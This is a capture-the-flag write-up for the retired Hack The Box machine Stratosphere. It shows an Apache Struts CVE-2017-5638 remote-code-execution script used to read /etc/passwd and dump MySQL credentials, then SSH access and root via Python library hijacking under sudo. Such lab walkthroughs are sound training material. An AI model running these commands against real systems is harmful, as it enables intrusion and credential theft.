Hi All, Stratopshere machine retired today on hackthebox Andddddddd YES! I will explain how I solved Stratosphere box on Hackthebox . This was a medium difficulty level box and one of the interesting box that has a nice privilege escalation technique.
check out hackthebox for upskilling your pentest game : https://www.hackthebox.eu/
lets begin with basic nmap scan.
root@kali:~# nmap -sC -sV 10.10.10.64 -T4
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-31 21:57 IST
Nmap scan report for 10.10.10.64
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (EdDSA)
80/tcp open http
from nmap scan , we have three ports open , out of which, port 80 and 22 is notable. It is feasible to start our enumeration from the web port 80 .
From the dirbuster bruteforce , we find out that there is hidden site hosted at http://10.10.10.64/Monitoring/
After a quick enumeration it is found out that , site is built using struts , and also vulnerable to Apache Struts CVE-2017-5638.
POC can be found here : https://github.com/mazen160/struts-pwn
we can get the code execution by executing the POC file as follows.
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘cat /etc/passwd’
richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash
from /etc/passwd file, we get the user named ‘richard‘ active on the machine
similarly it is found that it is running mysql with credentials ‘admin’/’admin’ from a file named db_connect . but since mysql is not exposed to the public, we have to rely on our previously found RCE to execute sql commands. this can be done as follows :
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘mysql -u admin -padmin users -e “show tables;”‘
from dumping tables , we find a table named ‘accounts‘ .
further dumping data from accounts table reveals certain credentials ,
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘mysql -u admin -padmin users -e “select * from accounts;”‘
fullName password username
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
These credentials can be used to connect through SSH on port 22. this gives us the user flag.
Desktop hashlib.py __pycache__ test.py user.txt
by quick enumeration , it is found out richard can execute few commands as root:
richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
and also , quick analysis of source code from test.py reveals, it is using hashlib library.
we can use a classic python priv esc library hijacking technique , where we can exploit how python looks for the imported libraries .
Since we have write permission to the working directory of the privileged python file. we can create a file named ‘hashlib.py’ with our custom code.. this makes python parser to look at our created file instead of the actual library file intended.
create a file named ‘hashlib.py’ in the same directory where ‘test.py’ is present with following content to display contents of root.txt file and spawn a root shell.(more on this priv esc technique: https://rastating.github.io/privilege-escalation-via-python-library-hijacking/)
now lets execute the following command to gain ROOT!
richard@stratosphere:~$ sudo /usr/bin/python3 /home/richard/test.py
Thank you. stay tuned for the next write up!